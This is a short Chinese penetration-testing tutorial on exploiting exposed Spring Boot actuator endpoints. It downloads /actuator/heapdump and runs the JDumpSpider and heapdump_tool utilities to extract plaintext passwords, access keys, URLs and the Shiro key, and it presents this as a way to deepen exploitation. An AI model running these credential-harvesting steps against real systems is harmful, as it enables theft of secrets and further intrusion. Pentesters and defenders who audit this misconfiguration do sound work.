Springboot信息泄露以及heapdump的利用

简介

渗透测试的时候老遇到spring的heapdump能下载但是不知道怎么利用,今天发几个工具让漏洞危害最大化。通过heapdump获取明文密码在深入利用。

利用

查看泄露的端点信息:http://127.0.0.1:8088/actuator

下载heapdump文件:http://127.0.0.1:8088/actuator/heapdump

工具1:JDumpSpider-1.1-SNAPSHOT-full.jar

下载地址: https://github.com/whwlsfb/JDumpSpider

HeapDump敏感信息提取工具

1
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

工具2:heapdump_tool

下载地址:https://github.com/wyzxxz/heapdump_tool

heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等。

1
2
3
4
5
6
7
8
9
10
11
java -jar heapdump_tool.jar heapdump
#获取密码
password
#获取IP
getip
#获取url
geturl
#获取所有字符串中的文件路径文件名
getfile
#获取shirokey的值
shirokey